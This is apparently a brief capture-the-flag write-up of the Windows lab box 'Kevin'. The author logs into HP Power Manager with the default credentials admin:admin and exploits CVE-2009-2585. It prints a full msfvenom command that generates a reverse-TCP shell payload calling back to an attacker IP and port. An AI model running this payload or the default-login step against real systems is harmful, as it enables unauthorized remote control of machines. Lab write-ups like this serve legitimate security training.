Kevin
Source: Proving Grounds OS: Windows Community Rating: Easy
Enumeration & Reconnaissance
Started autorecon and got flooded with open ports: 80, 135, 139, 445, 3389, 49152 -> 49159
Naturally, I started with my favorite, HTTP (80).
Gaining Initial Access
I was greeted by an HP Power Manager login page.

Out of pure muscle memory, I typed
admin:admin
, and boom, it worked. After a quick poke around that ended with nothing, I searched for exploits and found CVE-2009-2585.

Exploitation
To use this CVE, I needed a payload. So, I generated one with
msfvenom
:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.240 LPORT=4444 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python

Replaced the payload in the PoC and ran it, instant shell! And the best part? No privilege escalation needed. The exploit gave me SYSTEM straight away. Easiest win ever.

Privilege Escalation
None required; I was already SYSTEM upon initial access.
Lessons Learned
Check for CVEs
Last updated